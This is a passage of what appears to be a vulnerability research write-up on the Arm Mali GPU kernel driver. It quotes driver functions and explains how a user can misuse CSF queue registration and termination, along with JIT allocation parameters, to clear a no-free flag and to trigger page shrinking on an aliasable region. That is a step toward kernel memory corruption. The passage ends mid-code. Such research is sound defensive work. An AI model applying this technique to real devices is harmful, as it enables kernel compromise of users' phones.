<p>Taking another look at <code class="language-plaintext highlighter-rouge">csf_queue_register_internal</code>, we see that when a new CSF command stream queue is registered, the driver takes any valid GPU address that it can find a region for and uses that region as the ring buffer region for the command stream queue. There is no checking or filtering of region type and as long as the region is not invalid or free [1], the region will be used as the ring buffer region for the queue. The function sets the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag on the region [2],
which has no effect on a JIT region as that flag is already set when allocating memory for the
region (this will be elaborated in detail in the next section).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">csf_queue_register_internal</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_ioctl_cs_queue_register</span> <span class="o">*</span><span class="n">reg</span><span class="p">,</span> <span class="c1">// user controlled struct</span>
		<span class="k">struct</span> <span class="n">kbase_ioctl_cs_queue_register_ex</span> <span class="o">*</span><span class="n">reg_ex</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">queue_addr</span> <span class="o">=</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">buffer_gpu_addr</span><span class="p">;</span>
	<span class="n">queue_size</span> <span class="o">=</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">buffer_size</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">region</span> <span class="o">=</span> <span class="n">kbase_region_tracker_find_region_enclosing_address</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span>
					    <span class="n">queue_addr</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">kbase_is_region_invalid_or_free</span><span class="p">(</span><span class="n">region</span><span class="p">))</span> <span class="p">{</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>
		<span class="k">goto</span> <span class="n">out_unlock_vm</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="p">...</span>
	<span class="n">queue</span> <span class="o">=</span> <span class="n">kzalloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_queue</span><span class="p">),</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">kctx</span> <span class="o">=</span> <span class="n">kctx</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">base_addr</span> <span class="o">=</span> <span class="n">queue_addr</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">queue_reg</span> <span class="o">=</span> <span class="n">region</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">size</span> <span class="o">=</span> <span class="p">(</span><span class="n">queue_size</span> <span class="o">&lt;&lt;</span> <span class="n">PAGE_SHIFT</span><span class="p">);</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">csi_index</span> <span class="o">=</span> <span class="n">KBASEP_IF_NR_INVALID</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">enabled</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">region</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">KBASE_REG_NO_USER_FREE</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
	<span class="n">region</span><span class="o">-&gt;</span><span class="n">user_data</span> <span class="o">=</span> <span class="n">queue</span><span class="p">;</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>There is a terminate counterpart to the queue registering ioctl, called with the <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_TERMINATE</code> ioctl. This triggers <code class="language-plaintext highlighter-rouge">kbase_csf_queue_terminate</code>, which to no surprise,
tries to free the queue and unsets the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag on the queue’s ring buffer
region.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">kbase_csf_queue_terminate</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
	      <span class="k">struct</span> <span class="n">kbase_ioctl_cs_queue_terminate</span> <span class="o">*</span><span class="n">term</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">queue</span> <span class="o">=</span> <span class="n">find_queue</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">term</span><span class="o">-&gt;</span><span class="n">buffer_gpu_addr</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">queue</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="n">unbind_queue</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">queue</span><span class="p">);</span>
		<span class="p">...</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">WARN_ON</span><span class="p">(</span><span class="o">!</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">queue_reg</span><span class="p">))</span> <span class="p">{</span>
			<span class="cm">/* After this the Userspace would be able to free the
			 * memory for GPU queue. In case the Userspace missed
			 * terminating the queue, the cleanup will happen on
			 * context termination where tear down of region tracker
			 * would free up the GPU queue memory.
			 */</span>
			<span class="n">queue</span><span class="o">-&gt;</span><span class="n">queue_reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;=</span> <span class="o">~</span><span class="n">KBASE_REG_NO_USER_FREE</span><span class="p">;</span>
			<span class="n">queue</span><span class="o">-&gt;</span><span class="n">queue_reg</span><span class="o">-&gt;</span><span class="n">user_data</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="p">...</span>
		<span class="n">release_queue</span><span class="p">(</span><span class="n">queue</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Linking and unlinking a JIT region using this method would thus remove the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag and allow the region to be aliased, which has major consequences, as we’ll see in a bit. More information on JIT and alias regions will also be covered in the next section.</p>

<h1 id="leveraging-the-vulnerability">Leveraging the vulnerability</h1>

<p>Enqueueing a <code class="language-plaintext highlighter-rouge">BASE_KCPU_COMMAND_TYPE_JIT_FREE</code> command into a kcpu queue will
eventually trigger the function <code class="language-plaintext highlighter-rouge">kbase_kcpu_jit_free_process</code>, leading to <code class="language-plaintext highlighter-rouge">kbase_jit_free</code>
being called.</p>

<p>When the value of <code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code> is less than the current backed size of the region,
<code class="language-plaintext highlighter-rouge">kbase_jit_free</code> would use <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> to shrink the number of GPU page table
entries and free their corresponding backing physical pages.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">kbase_jit_free</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">)</span>
<span class="p">{</span>
    <span class="p">...</span>
    <span class="cm">/* Get current size of JIT region */</span>
    <span class="n">old_pages</span> <span class="o">=</span> <span class="n">kbase_reg_current_backed_size</span><span class="p">(</span><span class="n">reg</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">initial_commit</span> <span class="o">&lt;</span> <span class="n">old_pages</span><span class="p">)</span> <span class="p">{</span>
        <span class="cm">/* Free trim_level % of region, but don't go below initial
         * commit size
         */</span>
        <span class="n">u64</span> <span class="n">new_size</span> <span class="o">=</span> <span class="n">MAX</span><span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">initial_commit</span><span class="p">,</span>
                <span class="n">div_u64</span><span class="p">(</span><span class="n">old_pages</span> <span class="o">*</span> <span class="p">(</span><span class="mi">100</span> <span class="o">-</span> <span class="n">kctx</span><span class="o">-&gt;</span><span class="n">trim_level</span><span class="p">),</span> <span class="mi">100</span><span class="p">));</span>
        <span class="n">u64</span> <span class="n">delta</span> <span class="o">=</span> <span class="n">old_pages</span> <span class="o">-</span> <span class="n">new_size</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">delta</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">mutex_lock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">reg_lock</span><span class="p">);</span>
            <span class="n">kbase_mem_shrink</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">reg</span><span class="p">,</span> <span class="n">old_pages</span> <span class="o">-</span> <span class="n">delta</span><span class="p">);</span>
            <span class="n">mutex_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">reg_lock</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_mem_shrink</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="k">const</span> <span class="n">kctx</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="k">const</span> <span class="n">reg</span><span class="p">,</span> <span class="n">u64</span> <span class="n">new_pages</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">old_pages</span> <span class="o">=</span> <span class="n">kbase_reg_current_backed_size</span><span class="p">(</span><span class="n">reg</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">WARN_ON</span><span class="p">(</span><span class="n">old_pages</span> <span class="o">&lt;</span> <span class="n">new_pages</span><span class="p">))</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

	<span class="n">delta</span> <span class="o">=</span> <span class="n">old_pages</span> <span class="o">-</span> <span class="n">new_pages</span><span class="p">;</span>

	<span class="cm">/* Update the GPU mapping */</span>
	<span class="n">err</span> <span class="o">=</span> <span class="n">kbase_mem_shrink_gpu_mapping</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">reg</span><span class="p">,</span>
			<span class="n">new_pages</span><span class="p">,</span> <span class="n">old_pages</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
		<span class="cm">/* Update all CPU mapping(s) */</span>
		<span class="n">kbase_mem_shrink_cpu_mapping</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">reg</span><span class="p">,</span>
				<span class="n">new_pages</span><span class="p">,</span> <span class="n">old_pages</span><span class="p">);</span>

		<span class="n">kbase_free_phy_pages_helper</span><span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">cpu_alloc</span><span class="p">,</span> <span class="n">delta</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">cpu_alloc</span> <span class="o">!=</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="p">)</span>
			<span class="n">kbase_free_phy_pages_helper</span><span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="p">,</span> <span class="n">delta</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">new_size</code> in the <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> snippet above is the max of <code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code> and the
resulting trimmed number of pages controlled by <code class="language-plaintext highlighter-rouge">kctx-&gt;trim_level</code>. This means that to trigger
<code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code>, we need to reduce the value of <code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code> and set the
<code class="language-plaintext highlighter-rouge">kctx-&gt;trim_level</code> to a suitable level. We can use the ioctl <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_JIT_INIT</code> that
uses <code class="language-plaintext highlighter-rouge">kbase_region_tracker_init_jit</code> to set up JIT configurations for the current
<code class="language-plaintext highlighter-rouge">kbase_context</code> using user controlled values. As a result, the <code class="language-plaintext highlighter-rouge">kctx-&gt;trim_level</code> can be arbitrarily specified [1]. Subsequently, JIT allocations can be made using
kcpu queues.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_region_tracker_init_jit</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="n">u64</span> <span class="n">jit_va_pages</span><span class="p">,</span> <span class="kt">int</span> <span class="n">max_allocations</span><span class="p">,</span> <span class="kt">int</span> <span class="n">trim_level</span><span class="p">,</span> <span class="kt">int</span> <span class="n">group_id</span><span class="p">,</span>
<span class="n">u64</span> <span class="n">phys_pages_limit</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">err</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_max_allocations</span> <span class="o">=</span> <span class="n">max_allocations</span><span class="p">;</span>
		<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">trim_level</span> <span class="o">=</span> <span class="n">trim_level</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
		<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_va</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
		<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_group_id</span> <span class="o">=</span> <span class="n">group_id</span><span class="p">;</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>In order to change the value of the <code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code>, we can use the kcpu
<code class="language-plaintext highlighter-rouge">BASE_KCPU_COMMAND_TYPE_JIT_ALLOC</code> command. This command will initiate the
<code class="language-plaintext highlighter-rouge">kbase_kcpu_jit_allocate_process</code> that uses <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to perform the actual
allocation or retrieval of a JIT memory region.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">kbase_kcpu_jit_allocate_process</span><span class="p">(</span>
		<span class="k">struct</span> <span class="n">kbase_kcpu_command_queue</span> <span class="o">*</span><span class="n">queue</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_kcpu_command</span> <span class="o">*</span><span class="n">cmd</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="cm">/* Now start the allocation loop */</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">info</span> <span class="o">=</span> <span class="n">alloc_info</span><span class="o">-&gt;</span><span class="n">info</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">,</span> <span class="n">info</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="cm">/* Create a JIT allocation */</span>
		<span class="n">reg</span> <span class="o">=</span> <span class="n">kbase_jit_allocate</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="nb">true</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>In requesting the allocation, <code class="language-plaintext highlighter-rouge">commit_pages</code> [1] and <code class="language-plaintext highlighter-rouge">usage_id</code> [2] can be specified. These indicate the minimum number of
backing physical pages the allocation should have and the previous JIT allocation that the user wants to reuse respectively. We can freely define these member values of the <code class="language-plaintext highlighter-rouge">struct base_jit_alloc_info</code> and use it in the ioctl call to perform a JIT allocation.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">base_jit_alloc_info</span> <span class="p">{</span>
	<span class="n">__u64</span> <span class="n">gpu_alloc_addr</span><span class="p">;</span>
	<span class="n">__u64</span> <span class="n">va_pages</span><span class="p">;</span>
	<span class="n">__u64</span> <span class="n">commit_pages</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="n">__u64</span> <span class="n">extension</span><span class="p">;</span>
	<span class="n">__u8</span> <span class="n">id</span><span class="p">;</span>
	<span class="n">__u8</span> <span class="n">bin_id</span><span class="p">;</span>
	<span class="n">__u8</span> <span class="n">max_allocations</span><span class="p">;</span>
	<span class="n">__u8</span> <span class="n">flags</span><span class="p">;</span>
	<span class="n">__u8</span> <span class="n">padding</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">__u16</span> <span class="n">usage_id</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
	<span class="n">__u64</span> <span class="n">heap_info_gpu_addr</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>

<p>When actually performing the allocation, <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> first scans through a list of
inactive JIT allocations in <code class="language-plaintext highlighter-rouge">kctx-&gt;jit_pool_head</code> for a suitable region that has the same
<code class="language-plaintext highlighter-rouge">usage_id</code> specified when requesting the JIT allocation. If there is no such region, it tries to
search the same list for a region with the closest number of backing physical pages.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="nf">kbase_jit_allocate</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">const</span> <span class="k">struct</span> <span class="n">base_jit_alloc_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
		<span class="n">bool</span> <span class="n">ignore_pressure_limit</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
      <span class="p">...</span>
	<span class="cm">/*
	 * Scan the pool for an existing allocation which meets our
	 * requirements and remove it.
	 */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">info</span><span class="o">-&gt;</span><span class="n">usage_id</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
		<span class="cm">/* First scan for an allocation with the same usage ID */</span>
	    <span class="n">reg</span> <span class="o">=</span> <span class="n">find_reasonable_region</span><span class="p">(</span><span class="n">info</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_pool_head</span><span class="p">,</span> <span class="nb">false</span><span class="p">);</span>

	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">reg</span><span class="p">)</span>
		<span class="cm">/* No allocation with the same usage ID, or usage IDs not in
		 * use. Search for an allocation we can reuse.
		 */</span>
	    <span class="n">reg</span> <span class="o">=</span> <span class="n">find_reasonable_region</span><span class="p">(</span><span class="n">info</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_pool_head</span><span class="p">,</span> <span class="nb">true</span><span class="p">);</span>
      <span class="p">...</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="p">{</span>
          <span class="p">...</span>
          <span class="c1">// region found, move to active list</span>
          <span class="n">list_move</span><span class="p">(</span><span class="o">&amp;</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_node</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_active_head</span><span class="p">);</span>
          <span class="p">...</span>
          <span class="n">ret</span> <span class="o">=</span> <span class="n">kbase_jit_grow</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">reg</span><span class="p">,</span> <span class="n">prealloc_sas</span><span class="p">,</span>
				     <span class="n">mmu_sync_info</span><span class="p">);</span>
          <span class="p">...</span>
      <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span>
<span class="nf">find_reasonable_region</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">base_jit_alloc_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
		       <span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">pool_head</span><span class="p">,</span> <span class="n">bool</span> <span class="n">ignore_usage_id</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">list_for_each_entry</span><span class="p">(</span><span class="n">walker</span><span class="p">,</span> <span class="n">pool_head</span><span class="p">,</span> <span class="n">jit_node</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">((</span><span class="n">ignore_usage_id</span> <span class="o">||</span>
		     <span class="n">walker</span><span class="o">-&gt;</span><span class="n">jit_usage_id</span> <span class="o">==</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">usage_id</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
		    <span class="n">walker</span><span class="o">-&gt;</span><span class="n">jit_bin_id</span> <span class="o">==</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">bin_id</span> <span class="o">&amp;&amp;</span>
		    <span class="n">meet_size_and_tiler_align_top_requirements</span><span class="p">(</span><span class="n">walker</span><span class="p">,</span> <span class="n">info</span><span class="p">))</span> <span class="p">{</span>
			<span class="kt">size_t</span> <span class="n">min_size</span><span class="p">,</span> <span class="n">max_size</span><span class="p">,</span> <span class="n">diff</span><span class="p">;</span>

			<span class="n">min_size</span> <span class="o">=</span> <span class="n">min_t</span><span class="p">(</span><span class="kt">size_t</span><span class="p">,</span> <span class="n">walker</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">nents</span><span class="p">,</span>
					 <span class="n">info</span><span class="o">-&gt;</span><span class="n">commit_pages</span><span class="p">);</span>
			<span class="n">max_size</span> <span class="o">=</span> <span class="n">max_t</span><span class="p">(</span><span class="kt">size_t</span><span class="p">,</span> <span class="n">walker</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">nents</span><span class="p">,</span>
					 <span class="n">info</span><span class="o">-&gt;</span><span class="n">commit_pages</span><span class="p">);</span>
			<span class="n">diff</span> <span class="o">=</span> <span class="n">max_size</span> <span class="o">-</span> <span class="n">min_size</span><span class="p">;</span>

			<span class="k">if</span> <span class="p">(</span><span class="n">current_diff</span> <span class="o">&gt;</span> <span class="n">diff</span><span class="p">)</span> <span class="p">{</span>
				<span class="n">current_diff</span> <span class="o">=</span> <span class="n">diff</span><span class="p">;</span>
				<span class="n">closest_reg</span> <span class="o">=</span> <span class="n">walker</span><span class="p">;</span>
			<span class="p">}</span>

			<span class="cm">/* The allocation is an exact match */</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">current_diff</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
				<span class="k">break</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="k">return</span> <span class="n">closest_reg</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If a region is found, <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> will first move the region into an active list
(<code class="language-plaintext highlighter-rouge">kctx-&gt;jit_active_head</code>) and then call <code class="language-plaintext highlighter-rouge">kbase_jit_grow</code> which will attempt to allocate more
backing physical pages and map them if the <code class="language-plaintext highlighter-rouge">commit_pages</code> specified is more than the current
number of backing physical pages for the region.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">kbase_jit_grow</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		  <span class="k">const</span> <span class="k">struct</span> <span class="n">base_jit_alloc_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
		  <span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">,</span>
		  <span class="k">struct</span> <span class="n">kbase_sub_alloc</span> <span class="o">**</span><span class="n">prealloc_sas</span><span class="p">,</span>
		  <span class="k">enum</span> <span class="n">kbase_caller_mmu_sync_info</span> <span class="n">mmu_sync_info</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">nents</span> <span class="o">&gt;=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">commit_pages</span><span class="p">)</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="cm">/* Grow the backing */</span>
	<span class="n">old_size</span> <span class="o">=</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">nents</span><span class="p">;</span>

	<span class="cm">/* Allocate some more pages */</span>
	<span class="n">delta</span> <span class="o">=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">commit_pages</span> <span class="o">-</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">nents</span><span class="p">;</span>
	<span class="n">pages_required</span> <span class="o">=</span> <span class="n">delta</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">gpu_pages</span> <span class="o">=</span> <span class="n">kbase_alloc_phy_pages_helper_locked</span><span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="p">,</span> <span class="n">pool</span><span class="p">,</span>
			<span class="n">delta</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">prealloc_sas</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
	<span class="p">...</span>
<span class="nl">done:</span>
	<span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="cm">/* Update attributes of JIT allocation taken from the pool */</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">initial_commit</span> <span class="o">=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">commit_pages</span><span class="p">;</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">extension</span> <span class="o">=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">extension</span><span class="p">;</span>

      <span class="nl">update_failed:</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If the region already has more backing physical pages than the <code class="language-plaintext highlighter-rouge">info-&gt;commit_pages</code> specified, the fast path is taken and
<code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code> is updated to the smaller value without performing any actual allocation or mapping. This
makes it possible to modify the <code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code> of a previously allocated region to be smaller than its original value by simply attempting to make a JIT allocation.</p>

<p>On the other hand, when there are no inactive JIT allocations to reuse, <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code>
will allocate a new memory region using <code class="language-plaintext highlighter-rouge">kbase_mem_alloc</code>. A newly initialized <code class="language-plaintext highlighter-rouge">kbase_context</code>
has no active and inactive JIT allocations, as each <code class="language-plaintext highlighter-rouge">kbase_context</code> maintains its own
<code class="language-plaintext highlighter-rouge">kctx-&gt;jit_active_head</code> and <code class="language-plaintext highlighter-rouge">kctx-&gt;jit_pool_head</code> lists. Thus, a new <code class="language-plaintext highlighter-rouge">kbase_context</code> will always take the allocation path when attempting to allocate a JIT region for the first time.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="nf">kbase_jit_allocate</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">const</span> <span class="k">struct</span> <span class="n">base_jit_alloc_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
		<span class="n">bool</span> <span class="n">ignore_pressure_limit</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="cm">/* No suitable JIT allocation was found so create a new one */</span>
